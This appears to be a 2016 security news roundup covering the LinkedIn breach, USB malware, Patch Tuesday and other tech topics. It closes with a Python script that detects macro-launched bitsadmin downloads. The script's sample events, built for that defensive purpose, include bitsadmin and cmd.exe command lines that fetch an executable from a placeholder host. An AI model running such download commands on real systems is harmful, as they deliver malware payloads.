Security Protection – Harry Waldron MVP

LinkedIn – All users encouraged to reset passwords

LinkedIn is notifying all users to change their passwords, as an attack 4 years ago was much broader in scope than initially thought. Changing passwords periodically is a beneficial practice for any website where you hold an account or membership.

http://money.cnn.com/2016/05/19/technology/linkedin-hack/

LinkedIn was hacked four years ago, and what initially seemed to be a theft of 6.5 million passwords has actually turned out to be a breach of 117 million passwords.  On Wednesday, the professional social network company acknowledged that a massive batch of login credentials is being sold on the black market by hackers. The worst part about it is that, because people tend to reuse their passwords, hackers are more likely to gain access to 117 million people’s email and bank accounts. The advice for everyone who uses LinkedIn at this point is: Change your password and add something called two-factor authentication, which requires a text message every time you sign in from a new computer.

 

Hi Harry,

To make sure you continue having the best experience possible on LinkedIn, we’re regularly monitoring our site and the Internet to keep your account information safe. We’ve recently noticed a potential risk to your LinkedIn account coming from outside LinkedIn. Just to be safe, you’ll need to reset your password the next time you log in.

Here’s how:

1. Go to the LinkedIn website.
2. Next to the password field, click the “Forgot your password” link, and enter your email address.
3. You’ll get an email from LinkedIn asking you to click a link that will help you reset your password.
4. Once you’ve reset your password, a confirmation email will be sent to the confirmed email addresses on your account.
 
Thanks for helping us keep your account safe,
The LinkedIn Team

EMAIL – Best practices for corporate email etiquette in 2016

The following are key considerations for composing or answering email in a corporate setting. A few of these themes were covered in a webinar, and some were added from personal experience:

* Keep messages short and simple where possible

* Formulate a clear, concise message that gets readers’ attention and ultimately generates results

* Convey a professional image through the email you send

* Project communication savvy through action words

* Make idea lists first as a rough outline

* Determine goals, audience, and setting

* Get to the point by using strong subject lines, openings and closings

* Structure your message with a strong opening and a “punch line” closing

* Maintain a professional tone by recognizing what constitutes appropriate communication

* Polish your email with a professional style for yourself and your organization

* Graphics, small screenshots, and highlighted key text in the message are helpful

* Identify tone and emotional issues before sending

* Look for spelling or grammar errors prior to sending

* It is helpful to also read from the recipient’s viewpoint

* Double-check your message one last time before sending, recognizing that it is a “permanent record” that cannot be taken back or erased easily

Malware – USB media safety and trust factors for 2016

Two key takeaways from the article highlight the dangers associated with (1) plugging your own USB device into another computer that is already infected, or (2) finding and later using a USB device of unknown origin (which might also be infected).

http://www.pcworld.com/article/3070048/security/how-to-keep-usb-thumb-drive-malware-away-from-your-pc.html

Maybe you know not to plug strange USB drives into your computer, but trends indicate that most people think nothing of it. This is not a new risk. A decade ago, a group of penetration testers—hackers who are paid to break into companies, a la Sneakers—dropped 20 USB sticks around the parking lot of a credit union. Fifteen of them were found by employees, and each of those was eventually plugged into a computer, unwittingly running a program that communicated with a “bad” server.

In a recent and more rigorous experiment, a group of researchers from the University of Illinois Urbana-Champaign, University of Michigan and Google, dropped nearly 300 USB thumb drives around six campus locations and found that at least 45 percent of them were plugged into a computer and perused by the person who found them. While some of the people made an attempt to check the drive for malware—scanning it with antivirus software, for example—very few seemingly understood the risk of using an untrusted USB drive.

USB drives: Untrusted and ubiquitous — “In the current world, there is no advice, except to know the provenance of the USB drive,” Bailey said. “Do not trust, don’t plug or insert untrusted media into your computer.” For anyone tempted by the relative ubiquity of USB drives, this is hard advice to take. Security services provider Verizon, which publishes the annual data breach report, recommends that companies attempt to keep track of whenever USB drives are used. When the company finds untrusted USB drives, it can test them, said Chris Novak, a director with the firm’s RISK team, a computer investigations group.

Encrypted USB drives offer additional safety — When buying a drive, picking one with hardware encryption is also a good step. More advanced drives do not solve the basic problem of being a vector for malware, but they can protect the data on the drive and prevent firmware-based attacks such as BadUSB, according to Andrew Ewing, Flash Business Unit manager at storage-maker Kingston.

RECOMMENDATION — So, next time someone gives you a free USB drive, return it. If you find one on the ground, turn it in to lost-and-found. Plugging it into your computer is the worst digital hygiene, said Verizon’s Novak. “Think of USB sticks like toothbrushes and then you will not be so quick to pick it up and share it,” he says. (Ew.)

ISP – 2016 Satisfaction Survey by PC Magazine

Internet Service Providers are evaluated in the 2016 Satisfaction Survey by PC Magazine, linked below:

http://www.pcmag.com/article/344519/readers-choice-awards-2016-internet-service-providers

Readers’ Choice survey looks at your level of satisfaction with several aspects of the service including speed. Satisfaction is based on survey respondents’ perceptions rather than raw data and can be influenced by other factors including cost. For instance, a respondent may be very pleased with his connection speed, not because it’s so fast but because it feels appropriately fast for the price paid. On the other hand, there are respondents for whom speed is speed, and they won’t be satisfied unless their connection is blazingly fast, no matter the cost.

Respondents expressed dissatisfaction like never before with ISPs at the bottom of the pack. While our award winners’ ratings moved little from 2015, this year, the three lowest rated ISPs—Verizon DSL, Windstream DSL, and Frontier DSL—all had overall satisfaction ratings below 5.0, a threshold no provider fell below last year. Frontier’s rating of 3.8 can only be described as atrocious.

IBM – PCM is major advancement in memory technology

IBM engineers have created Phase Change Memory (PCM), which may represent a revolutionary step in meeting future storage needs reliably and economically.

http://www.prnewswire.com/news-releases/ibm-scientists-achieve-storage-memory-breakthrough-300269117.html

ZURICH, May 17, 2016 /PRNewswire/ — For the first time, scientists at IBM (NYSE: IBM) Research have demonstrated reliably storing 3 bits of data per cell using a relatively new memory technology known as phase-change memory (PCM).

The current memory landscape spans from venerable DRAM to hard disk drives to ubiquitous flash. But in the last several years PCM has attracted the industry’s attention as a potential universal memory technology based on its combination of read/write speed, endurance, non-volatility and density. For example, PCM doesn’t lose data when powered off, unlike DRAM, and the technology can endure at least 10 million write cycles, compared to an average flash USB stick, which tops out at 3,000 write cycles.

IBM scientists envision standalone PCM as well as hybrid applications, which combine PCM and flash storage together, with PCM as an extremely fast cache. For example, a mobile phone’s operating system could be stored in PCM, enabling the phone to launch in a few seconds. In the enterprise space, entire databases could be stored in PCM for blazing fast query processing for time-critical online applications, such as financial transactions.

How PCM Works — PCM materials exhibit two stable states, the amorphous (without a clearly defined structure) and crystalline (with structure) phases, of low and high electrical conductivity, respectively. To store a ‘0’ or a ‘1’, known as bits, on a PCM cell, a high or medium electrical current is applied to the material. A ‘0’ can be programmed to be written in the amorphous phase or a ‘1’ in the crystalline phase, or vice versa. Then to read the bit back, a low voltage is applied. This is how re-writable Blu-ray Discs* store videos.

“Phase change memory is the first instantiation of a universal memory with properties of both DRAM and flash, thus answering one of the grand challenges of our industry,” said Dr. Haris Pozidis, an author of the paper and the manager of non-volatile memory research at IBM Research – Zurich. “Reaching 3 bits per cell is a significant milestone because at this density the cost of PCM will be significantly less than DRAM and closer to flash.”

Leadership – Five Techniques for Getting Started

John Maxwell shares five key lessons learned from his earliest experiences that are helpful for all leaders.

http://www.johnmaxwell.com/blog/5-lessons-i-learned-when-just-starting-out

There are many leaders who face similar circumstances to the ones I faced with a small organization and few resources, but big dreams and goals. Being a one-man show isn’t ideal, but it can teach you a lot of great leadership lessons. Here are five lessons I learned:

1. Harness the energy of potential — Every day presented a first for me and my career. Because of this, I was able to wake up each day excited for what lay ahead of me. The key is disciplining yourself to look for it in every situation.

2. Tap into your imagination — It’s often easy to say, “Well, no one has ever done that before” and give up. But when you tap into your imagination, you can find your way around any problem—and possibly help other people find their way around it too!

3. Discover your strengths and focus on them — I soon discovered that there were areas where I seemed to be growing quickly, like communication, and others where I grew much more slowly, such as administration. I worked at both, but I never became a great administrator. Over time, however, my communication got better and better.

4. Learn to build momentum — It’s tempting to believe success comes in the form of a “home run”. You can become convinced that you are one big this, or one lucky that, away from really breaking out. The truth is your breakout will come from the small changes you make day after day.  Consistent work to improve your routine, your disciplines, and your knowledge accumulates over time, and produces the big this or the “luck” that you need.

5. Appreciate those who help — Everyone has people who support and help them on their way, and I was no different.

Apple iOS 9 – Over 80 Percent of users staying up-to-date

Apple recently published statistics documenting a high rate of user adoption for iOS 9, the latest version. As long as equipment and software environments are compatible, users often benefit from both improved security and functionality by staying on the latest editions of operating systems.

http://www.pcmag.com/news/344504/ios-9-adoption-rate-tops-80-percent

Apple’s iOS 9, which achieved the fastest iOS adoption rate ever in the days following its September 2015 release, is now installed on 84 percent of Apple’s mobile devices as of May 9, according to Apple’s developer website. Adoption of iOS 8 is at 11 percent, while earlier OSes are running on 5 percent of devices.

Users have long been keen to keep their iPhones and iPads up to date, but crossing the 80 percent mark for a single OS version is an important step as Apple gears up to release iOS 10. The company is expected to pull back the curtain on iOS 10 at its Worldwide Developers Conference next month and make it available in September.

Apple iOS 9 adoption numbers are also an indication of how quickly users are upgrading their devices. The operating system is compatible with phones as old as the iPhone 4s, as well as third-generation and newer iPads and fifth-generation or newer iPod touches. It’s also an improvement upon the adoption trajectory of its predecessor, iOS 8. Numerous bugs slowed iOS 8’s initial adoption, though it eventually reached 85 percent of Apple devices.

Microsoft Security Updates – MAY 2016

Below are key resources documenting this recent monthly Microsoft Patch Tuesday release:

https://technet.microsoft.com/en-us/library/security/ms16-may.aspx

https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+Summary+for+May+2016/21039/

https://isc.sans.edu/mspatchdays.html?viewday=2016-05-10

http://blog.talosintel.com/2016/05/ms-tuesday.html

Patch Tuesday for May 2016 has arrived where Microsoft releases their monthly set of security bulletins designed to address security vulnerabilities within their products. This month’s release contains 16 bulletins addressing 33 vulnerabilities. Eight bulletins are rated critical, addressing vulnerabilities in Edge, Internet Explorer, Office, Graphic Components, VBScript, and Windows Shell. The remaining bulletins are rated important and address vulnerabilities in Internet Explorer, Office, Windows Kernel, IIS, Media Center, Hyper-V, .NET, and several other Windows components.

IT Professionals – Techniques for difficult Job Interviews

While HR managers are better trained for interviewing prospective professionals, others who interview candidates may ask inappropriate or awkward questions. The Forbes article below notes some techniques that can be helpful:

http://www.forbes.com/sites/lizryan/2016/05/05/how-to-answer-rude-and-unprofessional-interview-questions/

A job-seeker has to be ready for anything. You can get to a job interview and have a wonderful conversation, or you can get there and sit in a dingy lobby for forty minutes while they try to find someone to talk to you.

Let’s get a few things straight. A job interview is not a date. It is not a police interrogation. You are an interviewer, not my financial advisor. You are not my therapist. It is none of your business what I earned last year or what my personal five-year plan might be, if I have one.

Only someone who’s in a close personal relationship with me or my therapist gets to ask me what I’m working on in my personal life. That is none of an interviewer’s business, obviously. So many of us grew up drinking the toxic corporate lemonade that we have lost sight of the fact that people get to have boundaries. That is their right, and we were brought up to treat people respectfully.

The reason so many interviewers are so rude to job-seekers is that they have subscribed to the religion that employers are mighty and job-seekers are ants. Most of us have bought into that myth at some point. We think it’s normal for a person who isn’t paying you, isn’t your banker and has never met you before to ask you what you earned at your job last year.

Malware – W2KM_DLOADR.OTO Microsoft BITS used to download payloads

The Internet Storm Center (SANS) reports a new malicious macro-based Word document targeting users in Turkey. Instead of using the Office-based XMLHTTP object, the macro uses the Microsoft Bitsadmin command-line tool to download malicious payloads onto the infected PC:

https://isc.sans.edu/forums/diary/Microsoft+BITS+Used+to+Download

A few days ago, I found an interesting malicious Word document. First of all, the file has a very low score on VT: 2/56 (analysis is available here). The document is a classic one: Once opened, it asks the victim to enable macro execution if not yet enabled. The document targets Turkish people. This is the interesting part. Instead of using a classic Microsoft XMLHTTP object, the macro downloads the payload via the tool Bitsadmin. Bitsadmin is a command line tool used to create download or upload jobs and monitor their progress. It is available by default since Windows 7 or Windows Server 2008 R2. “BITS” stands for “Background Intelligent Transfer Service”.
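One way to hunt for the behaviour described above is to look for `bitsadmin.exe` download jobs whose process ancestry includes an Office application. The following is an added example, not code from the ISC diary or this blog. The event records, file names and `example.test` URLs are constructed, and the field layout is an assumption modelled on the fields a process-creation log (for example Sysmon Event ID 1) provides.

```python
import ntpath
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DOWNLOAD_SWITCHES = {"/transfer", "/addfile"}   # bitsadmin switches that name a remote file
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation records (pid, parent pid, image path, command line).
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "cmdline": r'WINWORD.EXE /n "C:\Users\u\Downloads\fatura.doc"'},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c bitsadmin /transfer job1 /download http://files.example.test/p.exe %TEMP%\p.exe"},
    {"pid": 220, "ppid": 210, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download http://files.example.test/p.exe C:\Users\u\AppData\Local\Temp\p.exe"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers"},
    {"pid": 310, "ppid": 100, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /addfile upd https://updates.example.test/a.msi C:\Temp\a.msi"},
]

def basename(path):
    # ntpath parses Windows paths correctly regardless of the analyst's OS.
    return ntpath.basename(path).lower()

def office_ancestor(event, by_pid):
    """Walk parent links (macro -> cmd.exe -> bitsadmin) and return the Office exe, or None."""
    seen = set()
    cur = by_pid.get(event["ppid"])
    while cur and cur["pid"] not in seen:   # 'seen' guards against loops in bad data
        seen.add(cur["pid"])
        if basename(cur["image"]) in OFFICE:
            return basename(cur["image"])
        cur = by_pid.get(cur["ppid"])
    return None

def find_bits_downloads(events):
    """Flag bitsadmin invocations that fetch a URL; severity is high under an Office ancestor."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) != "bitsadmin.exe":
            continue
        tokens = {t.lower() for t in e["cmdline"].split()}
        urls = URL_RE.findall(e["cmdline"])
        if not (tokens & DOWNLOAD_SWITCHES) or not urls:
            continue   # e.g. "/list" is routine administration, not a download
        parent = office_ancestor(e, by_pid)
        alerts.append({"pid": e["pid"], "url": urls[0], "office_parent": parent,
                       "severity": "high" if parent else "medium"})
    return alerts
```

On real telemetry, key the process map on a unique process identifier rather than the bare PID, since PIDs are reused over time.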
